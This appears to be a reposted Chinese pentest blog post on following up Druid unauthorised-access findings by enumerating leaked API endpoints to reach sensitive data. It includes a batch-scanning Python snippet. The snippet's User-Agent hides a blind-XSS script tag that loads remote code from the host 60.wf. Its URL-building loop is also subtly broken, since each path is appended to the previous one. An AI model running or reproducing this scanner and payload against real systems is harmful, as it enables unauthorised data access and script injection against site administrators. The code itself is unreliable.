【實戰】druid未授權訪問后續利用


druid未授權訪問漏洞挖到過很多,但是多數都是沒有后續利用的,最近碰到了幾個,簡單記錄下:

主要關注這幾個點

 

 

URL監控泄露URI接口信息

 

這里遍歷接口有個小技巧,我們首先選取一些可能涉及敏感信息的接口去做測試,當然這里有很多接口是需要帶參數訪問的,不帶參數請求時有些服務端會返回參數,但是對於參數的內容,我們也需要一定的運氣才能構造正確進行正常請求,所以我們一般直接去找那種可以獲取所有字段信息的接口,一般不需要任何參數,就算需要參數也是簡單的page,pagesize這些,本例就是這樣:

 

一個接口直接獲取涉及敏感數據所需的很多重要參數,可進一步找接口進行構造:

批量檢測poc片段:

druid_path = r"""
    /druid/index.html
    /system/index.html
    /webpage/system/druid/index.html
    """
    paths = druid_path.strip().splitlines()

    for path in paths:
        url = url + path
        try:
            header = dict()
            header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
            requests.packages.urllib3.disable_warnings()#解決InsecureRequestWarning警告
            r = requests.get(url, headers=header, timeout=8, verify=False, allow_redirects=False)
            if r.status_code == 200 and "Druid Stat Index" in r.content:
                print '[druid unauth]\t' + url
            else:
                continue
        except:
            print 'fail'

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM